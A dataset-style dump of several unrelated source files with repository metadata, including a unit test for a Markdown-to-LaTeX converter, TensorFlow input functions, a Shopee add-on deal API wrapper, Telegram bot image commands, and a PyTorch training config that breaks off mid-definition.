366d7bbc976ef07876404b1d07a2c573cd256aa3
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_to_latex.py
|
andersjel/paka.cmark
|
366d7bbc976ef07876404b1d07a2c573cd256aa3
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_to_latex.py
|
andersjel/paka.cmark
|
366d7bbc976ef07876404b1d07a2c573cd256aa3
|
[
"BSD-3-Clause"
] | 1
|
2021-04-10T03:54:28.000Z
|
2021-04-10T03:54:28.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
class ToLatexTest(unittest.TestCase):
SAMPLE = (
"My humble mentoring experience tells me something about learning "
"programming. For complete beginners, it may be easier to learn "
"some kind of Lisp, and then transition to Python for more “real "
"world” code.\nOf course, various Lisps are used in production in "
"various companies in various projects, but Python is just more "
"popular.\n\nOne mentoree really understood object-oriented "
"programming (OOP) only after learning it with Racket, which is "
"usually characterized as “dialect of Scheme” (functional "
"language).\nMaybe it has something to do with syntax not getting "
"on beginner’s way :)\n\nПроверка---\"test\" -- test.")
def setUp(self):
from paka.cmark import LineBreaks, to_latex
self.func = to_latex
self.line_breaks = LineBreaks
def check(self, source, expected, **kwargs):
self.assertEqual(self.func(source, **kwargs), expected)
def test_empty(self):
self.check("", "\n")
def test_newline(self):
self.check("\n", "\n")
def test_hello_world(self):
self.check("Hello, Noob!\n", "Hello, Noob!\n")
def test_list(self):
expected = (
"\\begin{itemize}\n"
"\\item a\n\n"
"\\item b\n\n"
"\\end{itemize}\n")
self.check(" * a\n * b\n", expected)
def test_no_breaks_and_width(self):
expected = (
"My humble mentoring experience tells me something about "
"learning programming. For complete beginners, it may be easier "
"to learn some kind of Lisp, and then transition to Python for "
"more ``real world'' code. Of course, various Lisps are "
"used in production in various companies in various projects, "
"but Python is just more popular.\n\n"
"One mentoree really understood object-oriented programming "
"(OOP) only after learning it with Racket, which is usually "
"characterized as ``dialect of Scheme'' (functional language"
"). Maybe it has something to do with syntax not "
"getting on beginner's way :)\n\nПроверка-{}-{}-\\textquotedbl{}"
"test\\textquotedbl{} -{}- test.\n")
self.check(self.SAMPLE, expected)
self.check(self.SAMPLE, expected, breaks=False)
self.check(self.SAMPLE, expected, breaks=False, width=0)
self.check(self.SAMPLE, expected, breaks=False, width=7)
def test_hard_breaks_and_zero_width(self):
expected = (
"My humble mentoring experience tells me something about "
"learning programming. For complete beginners, it may be easier "
"to learn some kind of Lisp, and then transition to Python for "
"more ``real world'' code.\\\\\n"
"Of course, various Lisps are used in production in various "
"companies in various projects, but Python is just more "
"popular.\n\n"
"One mentoree really understood object-oriented programming "
"(OOP) only after learning it with Racket, which is usually "
"characterized as ``dialect of Scheme'' (functional language"
").\\\\\n"
"Maybe it has something to do with syntax not getting on "
"beginner's way :)\n\nПроверка-{}-{}-\\textquotedbl{}test"
"\\textquotedbl{} -{}- test.\n")
self.check(self.SAMPLE, expected, breaks="hard")
self.check(self.SAMPLE, expected, breaks=self.line_breaks.hard)
self.check(
self.SAMPLE, expected, breaks=self.line_breaks.hard, width=0)
def test_hard_breaks_and_non_zero_width(self):
expected = (
"My\nhumble\nmentoring\nexperience\ntells\nme\nsomething\n"
"about\nlearning\nprogramming.\nFor\ncomplete\nbeginners,"
"\nit may\nbe\neasier\nto\nlearn\nsome\nkind of\nLisp,"
"\nand\nthen\ntransition\nto\nPython\nfor\nmore\n``real\n"
"world''\ncode.\\\\\n"
"Of\ncourse,\nvarious\nLisps\nare\nused in\n"
"production\nin\nvarious\ncompanies\nin\nvarious\n"
"projects,\nbut\nPython\nis just\nmore\npopular.\n\n"
"One\nmentoree\nreally\nunderstood\nobject-oriented\n"
"programming\n(OOP)\nonly\nafter\nlearning\nit with"
"\nRacket,\nwhich\nis\nusually\ncharacterized\nas\n"
"``dialect\nof\nScheme''\n(functional\nlanguage).\\\\\n"
"Maybe\nit has\nsomething\nto do\nwith\nsyntax\nnot"
"\ngetting\non\nbeginner's\nway\n:)\n\nПроверка-{}-{}-"
"\\textquotedbl{}test\\textquotedbl{}\n-{}-\ntest.\n")
width = 7
self.check(self.SAMPLE, expected, breaks="hard", width=width)
self.check(
self.SAMPLE, expected, breaks=self.line_breaks.hard,
width=width)
def test_soft_breaks_and_zero_width(self):
expected = (
"My humble mentoring experience tells me something about "
"learning programming. For complete beginners, it may be easier "
"to learn some kind of Lisp, and then transition to Python for "
"more ``real world'' code.\nOf course, various Lisps are "
"used in production in various companies in various projects, "
"but Python is just more popular.\n\n"
"One mentoree really understood object-oriented programming "
"(OOP) only after learning it with Racket, which is usually "
"characterized as ``dialect of Scheme'' (functional "
"language).\nMaybe it has something to do with syntax not "
"getting on beginner's way :)\n\nПроверка-{}-{}-\\textquotedbl{}"
"test\\textquotedbl{} -{}- test.\n")
self.check(self.SAMPLE, expected, breaks=True)
self.check(self.SAMPLE, expected, breaks="soft")
self.check(self.SAMPLE, expected, breaks=self.line_breaks.soft)
self.check(self.SAMPLE, expected, breaks=True, width=0)
def test_soft_breaks_and_non_zero_width(self):
expected = (
"My\nhumble\nmentoring\nexperience\ntells\nme\nsomething\n"
"about\nlearning\nprogramming.\nFor\ncomplete\nbeginners,"
"\nit may\nbe\neasier\nto\nlearn\nsome\nkind of\nLisp,"
"\nand\nthen\ntransition\nto\nPython\nfor\nmore\n``real\n"
"world''\ncode.\nOf\ncourse,\nvarious\nLisps\nare\nused in\n"
"production\nin\nvarious\ncompanies\nin\nvarious\n"
"projects,\nbut\nPython\nis just\nmore\npopular.\n\n"
"One\nmentoree\nreally\nunderstood\nobject-oriented\n"
"programming\n(OOP)\nonly\nafter\nlearning\nit with"
"\nRacket,\nwhich\nis\nusually\ncharacterized\nas\n"
"``dialect\nof\nScheme\''\n(functional\nlanguage).\n"
"Maybe\nit has\nsomething\nto do\nwith\nsyntax\nnot"
"\ngetting\non\nbeginner's\nway\n:)\n\nПроверка-{}-{}-"
"\\textquotedbl{}test\\textquotedbl{}\n-{}-\ntest.\n")
width = 7
self.check(self.SAMPLE, expected, breaks=True, width=width)
self.check(self.SAMPLE, expected, breaks="soft", width=width)
self.check(
self.SAMPLE, expected, breaks=self.line_breaks.soft, width=width)
def test_no_breaks_and_smart(self):
expected = (
"My humble mentoring experience tells me something about "
"learning programming. For complete beginners, it may be easier "
"to learn some kind of Lisp, and then transition to Python for "
"more ``real world'' code. Of course, various Lisps are "
"used in production in various companies in various projects, "
"but Python is just more popular.\n\n"
"One mentoree really understood object-oriented programming "
"(OOP) only after learning it with Racket, which is usually "
"characterized as ``dialect of Scheme'' (functional language"
"). Maybe it has something to do with syntax not "
"getting on beginner's way :)\n\nПроверка---``test'' -- test.\n")
self.check(self.SAMPLE, expected, smart=True)
self.check(self.SAMPLE, expected, breaks=False, smart=True)
self.check(self.SAMPLE, expected, breaks=False, width=0, smart=True)
self.check(self.SAMPLE, expected, breaks=False, width=7, smart=True)
| 51.327381
| 77
| 0.624029
| 1,060
| 8,623
| 5.031132
| 0.174528
| 0.040503
| 0.048753
| 0.071254
| 0.909057
| 0.894056
| 0.894056
| 0.874367
| 0.855803
| 0.830114
| 0
| 0.001402
| 0.25548
| 8,623
| 167
| 78
| 51.634731
| 0.829283
| 0.002435
| 0
| 0.489933
| 0
| 0
| 0.558837
| 0.173605
| 0
| 0
| 0
| 0
| 0.006711
| 1
| 0.080537
| false
| 0
| 0.020134
| 0
| 0.114094
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2cdc0c9ee017840f8d96f7a181b4e58c0fbc0538
| 204
|
py
|
Python
|
source/utilities/directories.py
|
mfc2496/EyeSee-Server
|
fbe146fd6397a2312d95a335bbf7893d03af8a57
|
[
"MIT"
] | null | null | null |
source/utilities/directories.py
|
mfc2496/EyeSee-Server
|
fbe146fd6397a2312d95a335bbf7893d03af8a57
|
[
"MIT"
] | null | null | null |
source/utilities/directories.py
|
mfc2496/EyeSee-Server
|
fbe146fd6397a2312d95a335bbf7893d03af8a57
|
[
"MIT"
] | 1
|
2021-09-09T14:18:45.000Z
|
2021-09-09T14:18:45.000Z
|
# Hassan's Directory
# project_path = 'C:\\Users\\Hassan Javaid\\PycharmProjects\\EyeSee-Server\\'
# Mahnoor's Directory
project_path = 'C:\\Users\\Mahnoor Fatima Saad\\PycharmProjects\\EyeSee-Server\\'
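# A more portable alternative (hypothetical sketch, not part of the original
# code) would derive the path at runtime instead of hard-coding per-developer
# paths, e.g.:
# import os; project_path = os.path.dirname(os.path.abspath(__file__)) + os.sep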
| 34
| 81
| 0.745098
| 25
| 204
| 6
| 0.56
| 0.133333
| 0.226667
| 0.28
| 0.36
| 0.36
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 204
| 5
| 82
| 40.8
| 0.802139
| 0.558824
| 0
| 0
| 0
| 0
| 0.744186
| 0.44186
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fa6a39f15bcd762973daa038a8ce1e9300b64b08
| 226
|
py
|
Python
|
importtest.py
|
hvy/chainer-mnist
|
74e6b3ad12611b91b9aa8bd6d087a6ac4d22702b
|
[
"MIT"
] | null | null | null |
importtest.py
|
hvy/chainer-mnist
|
74e6b3ad12611b91b9aa8bd6d087a6ac4d22702b
|
[
"MIT"
] | null | null | null |
importtest.py
|
hvy/chainer-mnist
|
74e6b3ad12611b91b9aa8bd6d087a6ac4d22702b
|
[
"MIT"
] | null | null | null |
import numpy as np
import chainer
from chainer import cuda, Function, gradient_check, Variable, optimizers, serializers, utils
from chainer import Link, Chain, ChainList
import chainer.functions as F
import chainer.links as L
| 32.285714
| 92
| 0.823009
| 33
| 226
| 5.606061
| 0.636364
| 0.210811
| 0.183784
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132743
| 226
| 6
| 93
| 37.666667
| 0.943878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d7269c94ee1a4f8636ae155ec59ef93c69d4d26f
| 77
|
py
|
Python
|
lectures/code/dict_duplicate_keys.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | 4
|
2015-08-10T17:46:55.000Z
|
2020-04-18T21:09:03.000Z
|
lectures/code/dict_duplicate_keys.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | null | null | null |
lectures/code/dict_duplicate_keys.py
|
naskoch/python_course
|
84adfd3f8d48ca3ad5837f7acc59d2fa051e95d3
|
[
"MIT"
] | 2
|
2019-04-24T03:31:02.000Z
|
2019-05-13T07:36:06.000Z
|
>>> d = {1: 'one', 2: 'two'}
>>> d[1] = 'three'
>>> d
{1: 'three', 2: 'two'}
| 15.4
| 28
| 0.350649
| 13
| 77
| 2.076923
| 0.461538
| 0.222222
| 0.518519
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 0.220779
| 77
| 4
| 29
| 19.25
| 0.366667
| 0
| 0
| 0
| 0
| 0
| 0.246753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d778776a6b4fda3682673516277f8c71f3b475b0
| 5,099
|
py
|
Python
|
model/tfrecord_input_fn.py
|
jireh-father/tensorflow-triplet-loss
|
c8a3b3efbf4c68f63d58ee3bedaa8e42451f6a80
|
[
"MIT"
] | null | null | null |
model/tfrecord_input_fn.py
|
jireh-father/tensorflow-triplet-loss
|
c8a3b3efbf4c68f63d58ee3bedaa8e42451f6a80
|
[
"MIT"
] | null | null | null |
model/tfrecord_input_fn.py
|
jireh-father/tensorflow-triplet-loss
|
c8a3b3efbf4c68f63d58ee3bedaa8e42451f6a80
|
[
"MIT"
] | null | null | null |
"""Create the input data pipeline using `tf.data`"""
from model import tfrecords_dataset as td
import tensorflow as tf
def train_input_fn(data_dir, params):
"""Train input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.train(data_dir)
# if hasattr(params, "shuffle_rand_seed"):
# shuffle_rand_seed = params.shuffle_rand_seed
# else:
# shuffle_rand_seed = 1
# import tensorflow as tf
# shuffle_rand_seed_ph = tf.placeholder(tf.int64, ())
dataset = dataset.shuffle(1000) # whole dataset into the buffer
    dataset = dataset.repeat(
        params.num_epochs)  # repeat for multiple epochs
dataset = dataset.batch(params.batch_size)
dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset # , shuffle_rand_seed_ph
def train_input_fn_once(data_dir, params):
"""Train input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.train(data_dir)
dataset = dataset.batch(params.batch_size)
return dataset
def test_input_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.test(data_dir)
dataset = dataset.batch(params.batch_size)
dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset
def query_input_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.query(data_dir)
dataset = dataset.batch(params.batch_size)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset
def index_input_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.index(data_dir)
dataset = dataset.batch(params.batch_size)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset
def train_label_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.train_label(data_dir)
dataset = dataset.batch(params.train_size)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset
def test_label_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset = td.test_label(data_dir)
dataset = dataset.batch(params.eval_size)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset
def count_records(tfrecord_filenames):
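    """Count the total number of records across the given TFRecord files."""
    # Note: tf.python_io.tf_record_iterator is the TF 1.x API; in TF 2.x one
    # would iterate a tf.data.TFRecordDataset instead (left as-is here).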
c = 0
for fn in tfrecord_filenames:
for _ in tf.python_io.tf_record_iterator(fn):
c += 1
return c
def query_label_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset, files = td.query_label(data_dir)
cnt = count_records(files)
dataset = dataset.batch(cnt)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset, cnt
def index_label_fn(data_dir, params):
"""Test input function for the MNIST dataset.
Args:
data_dir: (string) path to the data directory
params: (Params) contains hyperparameters of the model (ex: `params.num_epochs`)
"""
dataset, files = td.index_label(data_dir)
cnt = count_records(files)
dataset = dataset.batch(cnt)
# dataset = dataset.prefetch(params.batch_size) # make sure you always have one batch ready to serve
return dataset, cnt
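# Usage sketch (hedged, not part of the original module): assuming a `params`
# object exposing the attributes the docstrings describe (num_epochs,
# batch_size, ...), a training pipeline could be built with, e.g.:
#   dataset = train_input_fn('/path/to/tfrecords', params)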
| 36.421429
| 361
| 0.651893
| 662
| 5,099
| 4.871601
| 0.125378
| 0.058605
| 0.060465
| 0.053023
| 0.823876
| 0.821705
| 0.821705
| 0.79876
| 0.788217
| 0.788217
| 0
| 0.002406
| 0.266327
| 5,099
| 139
| 362
| 36.683453
| 0.859663
| 0.586978
| 0
| 0.431373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.196078
| false
| 0
| 0.039216
| 0
| 0.431373
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d78a489a83fed4173997c92bf9c5c4b7951b7bb8
| 4,623
|
py
|
Python
|
pyshopee2/addondeal.py
|
tjengbudi/python-shopee
|
a74e99e7a900ed0a3c0cba2b7405238acf2ee16c
|
[
"MIT"
] | 166
|
2018-04-25T16:43:30.000Z
|
2022-03-20T07:07:39.000Z
|
pyshopee2/addondeal.py
|
tjengbudi/python-shopee
|
a74e99e7a900ed0a3c0cba2b7405238acf2ee16c
|
[
"MIT"
] | 34
|
2018-11-27T02:56:08.000Z
|
2022-01-28T05:24:57.000Z
|
pyshopee2/addondeal.py
|
tjengbudi/python-shopee
|
a74e99e7a900ed0a3c0cba2b7405238acf2ee16c
|
[
"MIT"
] | 62
|
2018-06-12T02:53:34.000Z
|
2022-03-13T07:31:34.000Z
|
from .base import BaseModule
class AddonDeal(BaseModule):
def add_add_on_deal(self, **kwargs):
"""
Add Add-on Deal
.
:param kwargs:
- add_on_deal_name Required
- start_time Required
- end_time Required
- promotion_type Required
- purchase_min_spend
- per_gift_num
- promotion_purchase_limit
"""
return self.client.execute("add_on_deal/add_add_on_deal", "POST", kwargs)
def add_add_on_deal_main_item(self, **kwargs):
"""
Add Add-on Deal Main Item
.
:param kwargs:
- add_on_deal_id Required
- main_item_list Required
- item_id Required
- status Required
"""
return self.client.execute("add_on_deal/add_add_on_deal_main_item", "POST", kwargs)
def add_add_on_deal_sub_item(self, **kwargs):
"""
Add Add-on Deal Sub Item
:param kwargs:
- add_on_deal_id Required
- sub_item_list Required
- item_id
- model_id
- status
- sub_item_input_price
- sub_item_limit
"""
return self.client.execute("add_on_deal/add_add_on_deal_sub_item", "POST", kwargs)
def delete_add_on_deal(self, **kwargs):
"""
Delete Add-on Deal
:param kwargs:
- add_on_deal_id Required
"""
return self.client.execute("add_on_deal/delete_add_on_deal", "POST", kwargs)
def delete_add_on_deal_main_item(self, **kwargs):
"""
Delete Add-on Deal Main Item
:param kwargs:
- add_on_deal_id Required
- main_item_list Required
"""
return self.client.execute("add_on_deal/delete_add_on_deal_main_item", "POST", kwargs)
def delete_add_on_deal_sub_item(self, **kwargs):
"""
Delete Add-on Deal Sub Item
:param kwargs:
- add_on_deal_id Required
- sub_item_list Required
- item_id
- model_id
"""
return self.client.execute("add_on_deal/delete_add_on_deal_sub_item", "POST", kwargs)
def get_add_on_deal_list(self, **kwargs):
"""
Get Add-on Deal List
:param kwargs:
- promotion_status Required
- page_no
- page_size
"""
return self.client.execute("add_on_deal/get_add_on_deal_list", "GET", kwargs)
def get_add_on_deal(self, **kwargs):
"""
Get Add-on Deal
:param kwargs:
- add_on_deal_id Required
"""
return self.client.execute("add_on_deal/get_add_on_deal", "GET", kwargs)
def get_add_on_deal_main_item(self, **kwargs):
"""
Get Add-on Deal Main Item
:param kwargs:
- add_on_deal_id Required
"""
return self.client.execute("add_on_deal/get_add_on_deal_main_item", "GET", kwargs)
def get_add_on_deal_sub_item(self, **kwargs):
"""
Get Add-on Deal Sub Item
:param kwargs:
- add_on_deal_id Required
"""
return self.client.execute("add_on_deal/get_add_on_deal_sub_item", "GET", kwargs)
def update_add_on_deal(self, **kwargs):
"""
Update Add-on Deal
:param kwargs:
- add_on_deal_id Required
- start_time
- end_time
- purchase_min_spend
- per_gift_num
- promotion_purchase_limit
- sub_item_priority
- add_on_deal_name
"""
return self.client.execute("add_on_deal/update_add_on_deal", "POST", kwargs)
def update_add_on_deal_main_item(self, **kwargs):
"""
Update Add-on Deal Main Item
:param kwargs:
- add_on_deal_id Required
- main_item_list Required
- item_id Required
- status Required
"""
return self.client.execute("add_on_deal/update_add_on_deal_main_item", "POST", kwargs)
def update_add_on_deal_sub_item(self, **kwargs):
"""
Update Add-on Deal Sub Item
:param kwargs:
- add_on_deal_id Required
- sub_item_list Required
- item_id
- model_id
- status
- sub_item_input_price
- sub_item_limit
"""
return self.client.execute("add_on_deal/update_add_on_deal_sub_item", "POST", kwargs)
def end_add_on_deal(self, **kwargs):
"""
End Add-on Deal
:param kwargs:
- add_on_deal_id Required
"""
return self.client.execute("add_on_deal/end_add_on_deal", "POST", kwargs)
| 26.568966
| 94
| 0.588146
| 594
| 4,623
| 4.173401
| 0.079125
| 0.141186
| 0.254135
| 0.129891
| 0.912465
| 0.886244
| 0.833401
| 0.689794
| 0.616378
| 0.579669
| 0
| 0
| 0.320787
| 4,623
| 174
| 95
| 26.568966
| 0.78949
| 0.386762
| 0
| 0
| 0
| 0
| 0.249646
| 0.225106
| 0
| 0
| 0
| 0
| 0
| 1
| 0.466667
| false
| 0
| 0.033333
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
d7925fceec9a18048da35875e2aadc112e6e7427
| 35
|
py
|
Python
|
apps/home/views/__init__.py
|
mpita/echolearn
|
110e65036dafa20ae5e129c32df69a3df6b14c42
|
[
"MIT"
] | null | null | null |
apps/home/views/__init__.py
|
mpita/echolearn
|
110e65036dafa20ae5e129c32df69a3df6b14c42
|
[
"MIT"
] | null | null | null |
apps/home/views/__init__.py
|
mpita/echolearn
|
110e65036dafa20ae5e129c32df69a3df6b14c42
|
[
"MIT"
] | null | null | null |
from .home import HomeTemplateView
| 17.5
| 34
| 0.857143
| 4
| 35
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d792df39ead377549d51d9fab328a350e623e0d1
| 468
|
py
|
Python
|
frsclient/service/v2/__init__.py
|
xunmeibuyue/IntelligentPeephole
|
c3bebf8792f019c859539607846971f33fee7cc2
|
[
"Apache-2.0"
] | null | null | null |
frsclient/service/v2/__init__.py
|
xunmeibuyue/IntelligentPeephole
|
c3bebf8792f019c859539607846971f33fee7cc2
|
[
"Apache-2.0"
] | null | null | null |
frsclient/service/v2/__init__.py
|
xunmeibuyue/IntelligentPeephole
|
c3bebf8792f019c859539607846971f33fee7cc2
|
[
"Apache-2.0"
] | null | null | null |
from frsclient.service.v2.api_collection_v2 import ApiCollectionV2
from frsclient.service.v2.compare_service import CompareServiceV2
from frsclient.service.v2.detect_service import DetectServiceV2
from frsclient.service.v2.face_service import FaceServiceV2
from frsclient.service.v2.face_set_service import FaceSetServiceV2
from frsclient.service.v2.live_detect_service import LiveDetectServiceV2
from frsclient.service.v2.search_service import SearchServiceV2
| 58.5
| 73
| 0.880342
| 59
| 468
| 6.813559
| 0.338983
| 0.226368
| 0.348259
| 0.383085
| 0.129353
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034642
| 0.074786
| 468
| 7
| 74
| 66.857143
| 0.893764
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
ad0aec65bca175c951f755b156f9aafedc388920
| 2,303
|
py
|
Python
|
nazurin/sites/Moebooru/commands.py
|
diclotgtest/nazurin
|
d695bc4b7ff9d54c9066f50ef4fb60f15acbc837
|
[
"MIT"
] | null | null | null |
nazurin/sites/Moebooru/commands.py
|
diclotgtest/nazurin
|
d695bc4b7ff9d54c9066f50ef4fb60f15acbc837
|
[
"MIT"
] | null | null | null |
nazurin/sites/Moebooru/commands.py
|
diclotgtest/nazurin
|
d695bc4b7ff9d54c9066f50ef4fb60f15acbc837
|
[
"MIT"
] | null | null | null |
from aiogram.dispatcher import filters
from aiogram.types import Message
from nazurin import bot, dp
from .api import Moebooru
moebooru = Moebooru()
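# Each handler below parses a post id from a regexp command (e.g.
# "/yandere 12345") and replies with the requested illustration, a document
# download, or a usage/error message.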
@dp.message_handler(
filters.RegexpCommandsFilter(regexp_commands=[r'/yandere (\S+)']))
async def yandere_view(message: Message, regexp_command):
try:
post_id = int(regexp_command.group(1))
if post_id < 0:
await message.reply('Invalid post id!')
return
illust = await moebooru.site('yande.re').view(post_id)
await bot.sendIllust(illust, message)
except (IndexError, ValueError):
await message.reply('Usage: /yandere <post_id>')
@dp.message_handler(
filters.RegexpCommandsFilter(regexp_commands=[r'/yandere_download (\S+)']))
async def yandere_download(message: Message, regexp_command):
try:
post_id = int(regexp_command.group(1))
if post_id <= 0:
await message.reply('Invalid post id!')
return
illust = await moebooru.site('yande.re').view(post_id)
await illust.download()
await bot.sendDocuments(illust, message)
except (IndexError, ValueError):
await message.reply('Usage: /yandere_download <post_id>')
@dp.message_handler(
filters.RegexpCommandsFilter(regexp_commands=[r'/konachan (\S+)']))
async def konachan_view(message: Message, regexp_command):
try:
post_id = int(regexp_command.group(1))
if post_id < 0:
await message.reply('Invalid post id!')
return
illust = await moebooru.site('konachan.com').view(post_id)
await bot.sendIllust(illust, message)
except (IndexError, ValueError):
await message.reply('Usage: /konachan <post_id>')
@dp.message_handler(
filters.RegexpCommandsFilter(regexp_commands=[r'/konachan_download (\S+)'])
)
async def konachan_download(message: Message, regexp_command):
try:
post_id = int(regexp_command.group(1))
if post_id <= 0:
await message.reply('Invalid post id!')
return
illust = await moebooru.site('konachan.com').view(post_id)
await illust.download()
await bot.sendDocuments(illust, message)
except (IndexError, ValueError):
await message.reply('Usage: /konachan_download <post_id>')
| 35.984375
| 79
| 0.668693
| 275
| 2,303
| 5.454545
| 0.174545
| 0.08
| 0.090667
| 0.061333
| 0.849333
| 0.849333
| 0.849333
| 0.849333
| 0.849333
| 0.801333
| 0
| 0.004417
| 0.213634
| 2,303
| 63
| 80
| 36.555556
| 0.823854
| 0
| 0
| 0.678571
| 0
| 0
| 0.130265
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ad26c34183524c16230815d12c619544487cafe6
| 4,846
|
py
|
Python
|
opt.py
|
QuIIL/Scale-Embedding-Shared-Neural-Network
|
3e3ed852e8b6a8bd0aeba37b20d067e618cb3728
|
[
"MIT"
] | null | null | null |
opt.py
|
QuIIL/Scale-Embedding-Shared-Neural-Network
|
3e3ed852e8b6a8bd0aeba37b20d067e618cb3728
|
[
"MIT"
] | null | null | null |
opt.py
|
QuIIL/Scale-Embedding-Shared-Neural-Network
|
3e3ed852e8b6a8bd0aeba37b20d067e618cb3728
|
[
"MIT"
] | null | null | null |
import torch.optim as optim
scale_embedding = {
'nr_classes' : 2,
'training_phase' : [
# {
# 'nr_epochs' : 30,
# 'optimizer' : [
# optim.Adam,
# { # should match keyword for parameters within the optimizer
# 'lr' : 5.0e-5, # initial learning rate,
# 'weight_decay' : 0.02
# }
# ],
# 'scheduler' : None, # learning rate scheduler
